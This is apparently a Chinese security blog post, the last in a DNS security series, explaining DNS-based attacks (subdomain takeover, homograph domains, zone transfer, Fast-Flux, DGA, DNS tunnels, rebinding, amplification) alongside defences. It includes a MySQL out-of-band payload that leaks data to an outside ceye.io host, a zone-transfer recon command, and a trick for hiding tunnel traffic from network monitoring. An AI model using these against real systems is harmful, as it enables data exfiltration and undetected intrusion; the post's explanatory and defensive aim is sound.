DNS 安全(三):利用 DNS 协议发起的攻与防

这篇写了好久...好在第三篇也是最后一篇,完结撒花!

利用 DNS 协议发起的攻与防

域名抢注

要抢注域名就得先遵守游戏规则,这个规则大部分是由 ICANN 制定,一部分是由注册商(经过 ICANN 授权的组织,并得到注册局运营商认证可以销售域名的单位)制定。

一个域名通常由以下几个状态:

  1. 正常状态:未过期,可正常使用
  2. 保留状态:已经到了过期时间,但还在注册商手中,这时候可以进行续费,并且没有额外的费用,具体的时间需要看注册商的实力以及和 ICANN 的关系,越大的注册商一般这个期限可以留的越长。一般是30天。
  3. 赎回状态:如果没赶得及在保留状态续费域名,域名会改变状态为“赎回等待”,那么这时候就需要多交钱才能重新得到域名所有权,在这个状态的域名已经一只脚踏进了坟墓,因为价格昂贵,不是很好的域名一般都会选择放弃。注册商要想在这个时候去 ICANN 执行续费相关的命令(涉及到 EPP 这个协议,感兴趣可以自行搜索)需要几十美元,所以注册商用户要多少钱就不好说了,一般有良心注册商的给的价格会是注册价格的 10 倍左右。
  4. 待删状态:这时候注册商的什么操作都不管用了,老老实实等删除吧。

但是,注册商又有一个骚操作:Pre-Relase 状态。这个状态其实是注册商自行创造的一个状态。ICANN 也不管,所以现在成了一个约定俗成的东西。那么,注册商为什么要设置这样一个状态呢?其实归根结底还是为了多赚钱。当一个的域名到了赎回状态的时候,一般人就放弃这个域名了,注册商也这么想,这个域名(有时候是很好的域名)直接交给 ICANN 删掉太可惜了。这个时候贴心的抢注商出现了,和注册商说你可以把域名让我来竞拍,如果拍出去了,并且原来的那个人没高价续费,那么我就分一部分钱给你,大家一起赚钱。如果拍出去,原来那个人花高价续费了,那就把域名还给他,至于那些竞拍的人,道个歉就好了,并且注册商能赚个赎回的差价。注册商一听,感觉不错,自己要么赚一部分拍卖的钱,要么赚续费差价的钱。于是 pre-release 状态就这么产生了。pre-release 状态严格来说属于赎回期,所以域名所有者可进行高价续费,但由于抢注商的介入,大家也可以去和注册商签约的抢注商那里参与拍卖。不过国内似乎还没见到过有这两种状态的注册商?

前段时间正好有一个域名不要了,现在是赎回状态,这里给大家看一下有多离谱:

平常我续一年只需要 25 块钱,现在是 1500 的赎回费。。。

既然域名可以抢注,那么自然会诞生恶意抢注,分为 3 种:

  1. 商业竞争:比如注册某知名企业域名,然后误导消费者来进行商业竞争,或者向该企业高价销售。这个时候可以向 ICANN 申请启动统一域名争议解决政策 (UDRP) 来解决
  2. 非著名域名抢注:例如百度拥有 baidu.com,像这类比较著名、重要的域名一般不会过期,但是百度可能拥有 enjoybaidu.com,这种不是那么重要的域名,网络组或者运维就比较容易不小心忘记续费这个域名,虽然几率也不大。
  3. 子域名劫持:子域名劫持有很多种方式,都与 cname 有关系。
    1. 未释放 cname 导致劫持:例如,我有一个域名 tr0y.wang,然后我在阿里云买了一个服务,给我分配的二级域名是 mi37m72bg.aliyunshop.com,这类二级域名一般是可以自定义的,因为自动分配的域名随机,不好记。于是我把它改为:tr0y.aliyunshop.com,这样客户访问 tr0y.aliyunshop.com 就能访问我的服务了。但是因为我的业务总会做大做强,所以老用阿里云的顶级域名显然有点挫。于是我把 shop.tr0y.wang cname 到 tr0y.aliyunshop.com 上,这样客户访问 shop.tr0y.wang 就能访问我的服务了。结果有一天,我的服务还是没能在残酷的厮杀下存活下来,所以我只能关闭我的业务,那么最简单的就是直接把买来的阿里云服务删掉。这个时候我已经失去了对 tr0y.aliyunshop.com 的所有权,如果我没有删除 shop.tr0y.wang 与 tr0y.aliyunshop.com 的 cname,只要有人接管了 tr0y.aliyunshop.com,就相当于接管了 shop.tr0y.wang。
    2. 域名劫持链:如果你想要劫持 shop.tr0y.wang,但是它却没有 cname 或者 cname 还没过期,可以看一下它引用的外部资源的子域名是否存在劫持的情况,例如 shop.tr0y.wang 有一个 source.macr0phag3.wang 的 js,而 source.macr0phag3.wang 存在子域名劫持,则同样可以对 shop.tr0y.wang 进行攻击。
    3. cname 过期导致劫持:服务的二级域名存在过期时间,比如 tr0y.aliyunshop.com 的有效期是 1 年,1 年之后,如果忘记及时续费了,被别人抢注了而你又没发现,cname 到 tr0y.aliyunshop.com 上的 shop.tr0y.wang 就会被控制。

那么如果成功劫持了域名,可以干嘛呢?

  1. 最主要就是导致跨域/授权的问题:比如大规模窃取 Cookie,一般一个公司的域名/子域名都会被主要的顶级域名信任,比如 test.baidu.com 可以读取 baidu.com 的 cookie,这样就可以实现劫持受害者账户的目的;或者是绕过 CSP 限制等等类似的问题。
  2. 钓鱼:这个就不用多说了,谁会想到 test.baidu.com 是攻击者所有呢?
  3. XSS:被引用的外部资源的子域名如果被劫持,则会导致引用此资源的域名被 XSS
  4. DDoS:域名/子域名如果被劫持,则可以加个对其他网站的引用,只要有人访问了此域名,就会顺带访问这个网站,导致 DDoS。有一个原理类似的例子,2013 年初的时候,一个开发者(iFish)写了一个浏览器抢票插件,这个插件的其中一个 js 文件托管在 GitHub 上,如果请求失败,则会 5 秒重试一次。于是,在 1 月 15 日,第一个订票小高峰到来的时候,GitHub 被间接的 DDos 了...

防御方式相对比较简单:

  1. 没被抢之前要监控好自己域名/子域名/cname 域名有没有过期(现在注册商都会发邮件提醒,一般都不会过期),被抢之后及时启动处理程序
  2. 存在 cname 域名的服务,在下线前要将 cname 清理干净

高仿域名

同形异义词攻击,从最开始的 www.app1e.com,稍微注意一下就能分辨;到现在的 www.аррӏе.comwww.аррle.com,这两个域名的 l 看起来非常接近;再到 аpple.comapple.com 用肉眼完全无法区分,高仿域名就像莆田的阿迪耐克,朝着“逼真、逼真、还是 tmd 逼真”的目标前进。我在之前的《从一个绕过长度限制 XSS,我们能学到什么?》中提到过这个攻击场景,包含很多细节知识,这里就不赘述了,建议大家前往阅读。

防御方式嘛,对于用户还真没什么好办法,一般都指望浏览器能给点力,“什么时候会显示 punycode,什么时候显示 Unicode 字符“这个逻辑别被某些 unicode 绕过。另外倒是有一个骚操作就是,如果你很确定之前在这个网站保存过密码,但是浏览器就是不填充的话,就说明这个域名很可能有问题,可以复制下来用 dig 看一下 ip,或者检查一下是否都是 ascii 字符。

未授权的域传送

现在 DNS 服务器越来越重要了,所以一般都有主、备服务器。那么主备之间的数据怎么同步呢?就是通过域传送来完成。DNS 域传送在 DNS 安全系列的第一篇《DNS 安全(一):基础知识复习》中已经介绍过了,忘记的橘友们可以去复习一下。

总之,域传送是指备服务器从主服务器那里拷贝数据,并用得到的数据更新自身数据库。所以正常情况下 DNS 区域传送操作只有经过授权的 DNS 服务器才有权执行,但许多 DNS 服务器却被错误地配置成只要有人发出请求,就直接提供一个 zone 的 DNS 内容。有了这份“网络蓝图”之后,攻击者直接降低了降低扫描成本,可以轻易获得子域名、ip(甚至可能包括测试服务器、内网服务器,这些节点的防御一般都比较弱),简单但高效,我们最喜欢这种手段了。

域传送的扫描通过 dig 就可以完成:dig axfr @dns-server domain。不过现在这种漏洞很少见了。

防御呢,也很简单,禁止未授权的域传送咯,什么 ip 白名单、认证都可以。

最后吐个槽,利用未授权的域传送收集信息,明显是针对 DNS 权威域名服务器的攻击(DNS 根与顶级服务器基本不用考虑),并且还需要知道二级域是什么,才能传送此二级域下的所有记录。我的服务器在前些日子被绿盟的扫描器扫出有 dns 域传送漏洞,可它明明是 localDNS...

c2 恶意域名

由于恶意域名类型有很多,所以需要注释一下的是,这里主要讨论 c2 相关的恶意域名。

传统 c2 域名

在传统的恶意软件中,攻击者往往会写死 c2 服务器的域名或者 ip,顶多也就整个列表然后随机抽取使用,又因为购买 ip 与域名都要花钱(ip 有可能部分是肉鸡,能少花点钱...),所以一般 c2 服务器的 ip/域名数很有限。再者,现在有很多安全研究员会对恶意样本进行分析,不管是流量分析还是逆向去看源码,c2 服务器地址一旦被找出,对于防御者来说,封杀是很容易的,但是对于攻击者来说,一个是不容易发现被封禁了,第二是不好对已经分发的恶意软件的代码进行改变。有人说可以通过下发补丁的方式进行更新。但是,在攻击者意识到需要更新控制端的时候,大概率 c2 服务器已经被大规模封杀了,代码没法下发;再者安全研究员一旦发现代码中有更新的逻辑,就可以通过篡改控制端,定制一个监控 c2 服务器地址更新的程序,只要 c2 服务器地址出现变动就会被安全研究员第一时间发现与曝光。这个年代,威胁情报的来源都比较多了,国内的微步、阿里云、启明星辰、天际友盟等;国外的 virustotal、cinssore.com、blocklist.de 等等,依托固定 ip/域名的 c2 服务器注定要被封杀得死死的。

Fast-Flux

为了避免 ip 被封和安全专家进行追踪溯源,恶意软件可以使用 Fast-Flux 在一定程度上满足这两个需求。风暴蠕虫的变种(2007 年)是第一个利用这一技术的恶意软件。Fast-Flux 的原理非常简单,就是频繁地改变域名的 A 记录。我们知道 DNS 的数据是有缓存机制的,但是这个缓存机制可以设置得很小,这样域名 A 记录的改动会很快地生效,这样恶意软件与 c2 服务器之间的每次通信,ip 都可能不一样,也就是说在短时间内查询使用 Fast-Flux 的域名,会得到不同的 ip。举例:

  1. 恶意软件与 c2 服务器准备建立通信,恶意软件硬编码的域名为 www.c2.com
  2. 为了得到 c2 所用的 www.c2.com 的 ip 地址,恶意软件发起 DNS 查询,之后就是走正常的 DNS 查询的那些流程。
  3. 权威 DNS 服务器返回了一个 ip 地址 1.2.3.4,同时 TTL 为一个很小的数值
  4. 恶意软件与 c2(1.2.3.4)建立通信,传输数据、获取恶意指令等等
  5. 通信结束
  6. 恶意软件再次准备与 c2 建立通信,同样先发起 DNS 查询,由于 TTL 过小,本地缓存的 DNS 记录失效,所以 localDNS 需要再次向权威 DNS 服务器获取 ip 地址,走正常的 DNS 查询的那些流程。
  7. 此次 DNS 服务器返回了 ip 4.3.2.1,这次的 TTL 仍然很小
  8. 恶意软件与 c2(4.3.2.1)建立通信,传输数据、获取恶意指令等等
  9. 通信结束

而 c2 服务器在上述过程中,会不断地改变域名与 ip 的 A 记录。这样在不改动恶意软件代码的情况下,不需要硬编码 ip 随机选择,就达到了快速变换通信 ip 的目的。

Fast-Flux 从技术上可分为两类:Single-Flux 和 Double-Flux。主要的区别就在于,Single-Flux 是在别人提供的权威 DNS 服务器中频繁地更改域名的 ip A 记录,这样容易被权威域名服务器的管理者检测出来,导致僵尸网络暴露。示例如下:

Double-Flux 的实现是攻击者自己搭建了几台 DNS 权威服务器,这样的话只需要低频地修改上一级的 DNS 顶级服务器的记录即可。示例如下:

显然,Double-Flux 比 Single-Flux 要麻烦一些,但是更加隐蔽了。

这里顺便提一下,Fast-Flux 会使得追踪与还原僵尸网络变得更加困难,提升僵尸网络的健壮性。例如现在有些僵尸网络已经不是下图的样子了:

而是

这里的 proxy 一般都不是控制者自己的买服务器,而是入侵之后控制的服务器,proxy 只做通信的转发,而真正的 c2 服务器(c2 母体)隐藏在 proxy 之后,这些是控制者自己的买服务器。Fast-Flux 可以使得 proxy 集群飞速发生变化,不断的会有新的 proxy 加入、删除,很难拥有一份完整的名单,要想关闭整个僵尸网络需要耗费大量的时间(akamai 在 2017 年有一份追踪报告:https://blogs.akamai.com/2017/10/digging-deeper-an-in-depth-analysis-of-a-fast-flux-network-part-two.html ,里面提到他们监视 Fast Flux 网络 ip 地址轮换的时候,保存 4 份快照,每个快照保存了一星期的 ip 地址,然后他们发现平均有 75% 的 ip 地址在快照之间发生了变化,而比较第一个快照和第四个快照的时候,只有 19% 的 ip 地址没变过)。

不过 Fast-Flux 极度依赖 TTL,有些运营商(localDNS)是不会鸟你的 TTL 的,默认全部的 TTL 就是某一个值;还有包括在第二篇中分享的那个 DNS 缓存分布图,每一层都可能进行缓存,这些都会导致 Fast-Flux 失效。所以有些攻击者还会多配几个 A 记录,这样就算缓存时间比较长,ip 也会轮着来用(橘友们多试几下 dig baidu.com 就可以观察到两个 ip 的顺序会发生变化并不是固定的)。

最后,Fast-Flux 使得每次通信的 ip 都可能发生变化,虽然的确提升了封禁 ip、排查与溯源的难度,但是如果防御者采取封禁域名的方式,那么 Fast-Flux 依旧无能为力,所以还需要有一种办法,能够提升防御方封禁域名的难度。

利用可信第三方托管恶意数据

能写出健壮恶意软件的黑客们肯定也明白这个道理,于是他们开始寻找解决方案。一个最简单的办法就是利用第三方可信网站来托管 c2 服务器的地址,或者干脆直接把第三方可信网站当做 c2 “服务器”。举个例子,有黑客通过把命令隐藏在 Twitter 的推文图片中来逃避检测(CTF misc 的隐写术终于派上用场了)。这一招非常有效,很难被检测出来,其他的托管网站还有什么 Gmail、DropBox、PasteBin、GitHub、各大 cos 云存储、论坛...举个非常典型的例子,利用 microsoft.com 的子域名来逃避检测,Twitter 可以不用,但是 Windows 的主机总不能把 microsoft.com 的域禁用了吧?那么你能看出下面的 DNS 解析记录哪个有问题吗?

social.msdn.microsoft.com,这个是微软的开发者社区论坛,看起来这只是用户在浏览微软论坛而已。实际上黑客把 payload 隐藏在用户信息的 about me 里了:

你甚至还可以创建一个谷歌可以检索的网页,这个网页的 url 地址中包含需要的 payload:

通过类似的手段,payload 只需要通过搜索引擎就可以获得(虽然更新 payload 需要的时间会久一些),禁用搜索引擎的地址也不现实吧。

虽然这些域名是可信的,但是却能被 c2 服务器用来下发恶意指令,完成对被控端的控制。

DGA

虽然利用可信第三方来托管远控命令等恶意数据,能够大大提升避免被防御者检出的概率,但是这类可信第三方可利用的途径总归是相对有限的。并且,主机可以通过严格的上网行为控制来防御这类恶意域名,例如搭建内部的 git、只允许服务器访问特定的域名等等。最后也是最重要的一点,第三方托管,依旧没有解决“动态更新”这个痛点,对于单个、小规模的 c2 来说,可以使用,但是对于稍大一些的僵尸网络,如果被托管的位置被端掉(比如 topic 被禁或者账户被删除等等),都会使得苦心经营已久的僵尸网络团灭,对于攻击者来说这是非常要命的事情。于是,c2 通信机制又进行了一次进化。

DGA(Domain Generation Algorithm),域名生成算法,于 2009 年被发现。原理也非常简单:恶意软件通过 DGA 算法生成大量备选的域名(AGD,Algorithmically Generated Domains),判断域名是否被注册,选取已注册的尝试建立通信;攻击者与恶意软件运行同一套 DGA,生成相同的备选域名列表,当需要发动攻击的时候,选择其中少量进行注册,便可以等待恶意软件建立通信。那么重点就在于,这个 DGA 具体是怎么算的呢?按照不同的分类方式有不同的结果:

  1. 按照种子是否能够预测
    1. 可以预测:例如时间戳、日期
    2. 无法预测:例如今天 A 股是涨还是跌、欧洲中央银行每天发布的外汇参考汇率(Bedep)、Twitter 的关键词作为种子(Torpig)、微博热搜第一等
    3. 1、2 两者并存
  2. 按照生成算法
    1. 基于算术:生成一组可用 ASCII 编码表示的值作为 AGD,流行度最高
    2. 基于哈希:利用哈希值的 16 进制作为 AGD,被使用的哈希算法常有:MD5,SHA256
    3. 基于词典:从词典中挑选单词进行组合成 AGD。这样可以减少域名字符上的随机性,迷惑性更强,词典可以内嵌在恶意程序中或者从公开的服务中提取
    4. 基于排列组合。对一个初始域名进行字符上的排列组合,生成 AGD

根据种子和生成算法的不同,DGA 可以选择不同种子类型和算法类型进行组合,因此最终 AGD 的多样性很高。检测 DGA 域名是一个很有意思的事情,除了常规的手段(比如因为 DGA 一般是生成一批域名然后挨个尝试解析,所以会产生不少 NXDOMAIN 的响应,这算一个常规的检测维度),DGA 的检测也会用到机器学习与深度学习,这是很经典的人工智能在安全领域的运用,这部分我也还在学习当中,等时机成熟我会写系列文章分享人工智能+网络安全,里面会有一篇文章说 DGA 的检测。

由于 AGD 的存活时间一般较短,大部分域名的存活时间为 1-7 天,因此对防御方的检测实时性提出了更高的要求,否则等你检测出来之后早就换下一批了,基于黑名单或者是威胁情报的办法已经基本失效了。最开始的时候编写恶意软件的黑客们使用的 DGA,都是会生成随机性很高的 AGD 的算法,这种域名与正常的域名差别很大,容易被检测出来,所以后来慢慢开始出现基于词典的算法,从字符分布上尽量贴近正常域名,极大地降低了域名的随机性,进一步加大了检测的难度。还有,正如上一篇提到的,随着 DoT(DNS-over-TLS)、DoH(DNS-over-HTTPS)协议的提出与陆续通过 RFC 标准,初衷虽然是用于保护用户隐私的,但另一方面,加密的 DNS 通信也会给 AGD 的检测带来全新的挑战。

至此,手握恶意软件的黑客们终于利用 DGA 实现了域名的变化,解决了“动态更新”这个痛点,而再利用 Fast-Flux 解决了 ip 快速变化的需求,未来甚至能够依靠加密的 DNS 通信进一步隐藏痕迹。攻与防就是这样此消彼长,互相促进,互相阻碍,安全对抗依旧任重道远。

本大节结束的最后,我有一个观点想提的是,依托纵深防御策略,对于检测恶意软件通信时漏掉的部分,可以利用 HIDS 检测恶意软件的执行过程来兜底,或许是另一种维度的可行的组合方案。

隐蔽隧道

啊,隐蔽隧道,贼有意思,原理也很简单。这里由于是 DNS 安全系列文章,所以就限定在 DNS 隐蔽隧道啦。原理就是把数据托管给 DNS,让它帮忙带出去、带回来。对于 DNS 协议的检测与防御,防火墙、IDS/IPS 也会稍弱一些。大家首次接触 DNS 隐蔽隧道的时候,应该是在 mysql OOB(Out-of-Band)吧?经典 payload:SELECT LOAD_FILE(CONCAT('\\\\',version(),'.8cs2vs.ceye.io\\abc'));。当然这里只有带出去,没有带回来,只能完成数据的单向传输。下面的 DNS 隐蔽隧道指的均为双向通道,毕竟双向通道的功能完全覆盖了单向通道的功能。

DNS 隐蔽隧道按照链路可以分为 2 种:

  1. 直连:DNS 服务器(一般是 localDNS 或者是权威 DNS 服务器)是攻击者所有。攻击者把数据附在 DNS 查询的域名里,然后向自己控制的 DNS 服务器发起请求(例如 A、TXT 等),通信的目的服务器都是攻击者所有,那么那要返回什么数据都好说了。
    1. 优势:直连速度快;可以使用任意域名建立隐蔽隧道;避免 DNS 缓存机制的干扰
    2. 劣势:用非著名的外网 DNS 服务器进行通信容易引起注意,且限制严格的公司一般也不会放行这些流量;
  2. 中继:权威 DNS 服务器是攻击者所有。攻击者把数据附在 DNS 查询的域名里,然后走正常的 DNS 查询流程,到了最后一步就是 DNS 权威服务器返回响应了,既然 DNS 权威服务器是攻击者所有,那自然要返回什么数据都好说了。
    1. 优势:相对直连,没那么容易引起注意;
    2. 劣势:由于要走完整的流程,所以速度慢,丢包也可能比较严重;需要注意 DNS 缓存机制的干扰。

从上面可以看出,DNS 隐蔽隧道是一种通信手段,现在很多工具是基于这个手段去实现的反弹 shell(本质上是 c2)。

根据我的使用经历,有些工具只完成了第二种,很多人也偏爱用第二种,其实我觉得第一种在某些场景下有很大的作用。比如现在 NIDS 会有流量存储的功能,那么如果资源不太够的话(据我所知一般安全部门的资源都不太够...),往往会选择剔除一部分流量。剔除的策略如果设置得不太好的话,比如保存 DNS 流量的时候,过滤对大厂的域名(baidu.com、qq、wechat、apple、github...)的查询,即认为查询这些域名/子域名均视为正常 DNS 流量,那么第一种就有可乘之机。例如攻击者可以对攻击者控制的 DNS 服务器发起对 base64(传输的数据).qq.com 的查询,按照上面的策略就不会保存/检测这个流量。

要说实现起来,发起请求的时候一般用的 A 记录,有时候需要用 TXT 记录,比如下载文件等,因为可以返回更多的内容;然后既然本质上是 c2,所以攻击者还可以利用上面的 Fast-Flux/DGA/DoT/DoH 使得自己更加难以检测与追踪。后面我应该会写一个隐蔽隧道的工具,包含其他种类的隐蔽隧道,比如 icmp 之类的,链路就是第一种与第二种,可能也会加入加密的 DoT/DoH。

至于针对 DNS 隐蔽隧道的检测嘛,payload 大部分是编码过的,base64 之类的;查询的子域名变动比较剧烈(因为这部分就是数据嘛);为了完成一次通信,可能需要频繁发起 DNS 查询,尤其是 TXT 查询暴涨等等...这些都是特征,内容也比较多,单独写一篇来分享吧。

DNS 重绑定攻击

DNS 重绑定的原理非常简单,就是利用了 Fast-Flux 的原理:设置很小的 TTL。

攻击的过程示例如下:

  1. 用户在地址栏中输入域名(例如 http://tr0y.wang )或者点击链接
  2. 浏览器通过 DNS 协议将域名(http://tr0y.wang )解析为 ip 地址(1.1.1.1),然后向对应的 ip 地址(1.1.1.1)发起请求,然后用户就能看到返回的页面
  3. 由于返回的页面中经常包含同域名下的 js 或者 css(http://tr0y.wang/main.js), 所以浏览器需要再次对此域名发出请求(去拿 main.js)
  4. 因为攻击者拥有此域名的 DNS 权威服务器,所以他可以把 TTL 设置的很小(比如 0)。由于 TTL 很短,所以在请求 main.js 的时候,浏览器发现域名缓存过期了,就不得不重新解析一下 ip 地址
  5. 域名持有者在用户第一次解析域名(即访问 http://tr0y.wang )之后,立即修改此域名对应的 ip 地址为 127.0.0.1,这样访问 http://tr0y.wang/main.js 实际上就是访问 http://127.0.0.1/main.js

对于浏览器来说,整个过程访问的都是同一域名,所以没有同源策略的限制(尤其需要注意端口要一致)。如果攻击者已知目标的一些内网 ip,就可以把第二次解析的 ip 换成这个内网 ip,然后把上面加载 main.js 的逻辑替换为执行恶意的 js 代码,就可以针对这个内网 ip 构造出对应的恶意请求发起攻击。

以上的流程应该没什么理解上的问题。但是由于这个攻击方式常被用于 CSRF/SSRF 上,所以我建议橘友们再多与 CSRF 知识联系起来想一想。综合 DNS 重绑定的思路,如果说要实现 CSRF,其实有三种层次(假设下面均满足 csrf 所需的条件):

  1. 在 hack.tr0y.wang 上放一个 js 标签,地址为 https://bank.com/transfer/money ,诱使用户访问 hack.tr0y.wang,浏览器会自己去访问这个转账的地址,实现攻击,偷钱跑路。
  2. 将 hack.tr0y.wang 的 A 记录改为 10.10.10.10,相当于我把自己的域名绑定在了内网的服务器(ip)上,那么这样访问 hack.tr0y.wang 实际上就是访问 10.10.10.10,那么不管是欺骗用户访问 http://10.10.10.10/+payload 还是诱使用户访问 https://hack.tr0y.wang 并在里面嵌入对 10.10.10.10 的攻击请求,都可以实现攻击。当然这要有前提,就是 10.10.10.10 没有对 HOST 进行校验。这个方式相比第一种来说,它完全符合浏览器的同源策略,所以不仅仅只能通过 html 标签发起简单的 get 请求,还可以利用 js 发起更加复杂的请求,也就是拓宽了利用场景。
  3. DNS 重绑定攻击,与第二种其实是很像的,第 1、2 种能做到它都能做到,还不受同源策略的限制。重点就在于它使得多次解析的结果不固定。所以利用这一点,它还可以有其他用途,比如用在 SSRF 上,有些 SSRF 防御策略的第一步是先提取域名,然后解析一下看 ip 是不是内网 ip,但是到最后发起请求的时候依旧用的是域名,在第一次判断时进行解析与请求时进行解析,它们之间的时间差就给攻击者留下了可乘之机。

当然,DNS 重绑定攻击自然也要面对 TTL 相关的问题,在上面 Fast-Flux 已经说过了。这里就说一点,如果你实在懒得写更换 A 记录的代码(比如我),或者担心运营商“反向助攻”,你就配置 2 个 A 记录就完事了,一个是正常的外网 ip,一个是你目标的内网 ip,虽然不会每次都成功,但是可以多执行几次恶意代码,多试几次总会成功的嘛,实现起来也比较方便。

那怎么让位于目标内网的机器访问这个网站呢?这就得各位各凭本事了,主要是社工;对于某些公司的爬虫,也可以弄个陷阱,等爬虫来爬的时候触发。

至于防御思路嘛:

  1. 首先 DNS 重绑定攻击,攻击起来略微复杂,自身也具有一定的局限性,即 TTL 相关的问题(上面提到过 Fast-Flux 的局限性)。像 Java JVM 也存在 DNS 缓存机制,失败默认 TTL 为 10s,成功默认 TTL 为 30s。
  2. 系统放在内网并不意味着安全,要加上权限验证措施
  3. 上 HTTPS,这样在验证证书的时候会出错,因为证书的 subject 应该要与域名一致,而重绑定之后,域名是攻击者的,但是证书却是攻击目标的。
  4. 验证 HOST,即不允许任意域名都能与自己的 ip 绑定且还能够正常使用,浏览器会自己带上 HOST,由于 DNS 重绑定的 HOST 是攻击者所有,所以很容易可以看出异常
  5. 对于上面那种 SSRF 的场景,在第一次解析之后就要保存解析结果给后面的请求执行(相当于维护一份 DNS 缓存),而不是再发出一次 DNS 解析请求
  6. 如果是为了利用 DNS 重绑定攻击完成的 CSRF,那么大部分防御 CSRF 的手段都是适用的(但是基于同源策略的防御措施是失效的,比如 csrf token)

DDoS 放大

DDoS 放大上一篇提过一部分,我们知道 DNS 大部分情况下用的 udp,并且回复数据包大于请求数据包,所以可以被用来放大 DDoS 流量去打别人。上一次讲的是 利用回复数据包大于请求数据包 这一点来攻击 DNS 服务器;而这里侧重的是“利用 DNS 放大 DDos 流量去攻击其他人”,即利用回复数据包大于请求数据包+源地址可以伪造 来攻击其他客户端/服务器:

原理以及简单的 poc 其实与上一篇一样,橘友们若忘记了可以移步前往复习,这里主要是为了知识的分类,所以在这个地方单独开了一节,可以参考最下面的思维导图。

相似的还有其他类似的 DDoS,由于 DDoS 相关的知识后面有专门的系列会讲,所以这里就不详细说啦。

总结

最后附上一份 DNS 协议的格式,我感觉这种 ascii 画的图非常符合我的审美:

https://github.com/deepwn/dn2.io/blob/master/dns_protocol.md

DNS 系列终终终终终终终于完成了!从 9 月初开始写第一篇,到现在快 2 个月才把这个系列写完,8416+5543+9801 一共是 23k 字。这是我第一次尝试写一个大的系列,可能看起来会乱一些,所以我整理了一下:

只是没想到,这个系列又给我开了好多的新坑,提到的那些要单独写的文章,后面会慢慢补充上去的,橘友们敬请期待咯~


拖更是不可能拖更的
只要别给自己设置定期更新的 flag
就永远不会拖更


DNS 安全(三):利用 DNS 协议发起的攻与防
https://www.tr0y.wang/2020/11/02/DNS-3-attack-by-dns/
作者
Tr0y
发布于
2020年11月2日
更新于
2024年6月3日
许可协议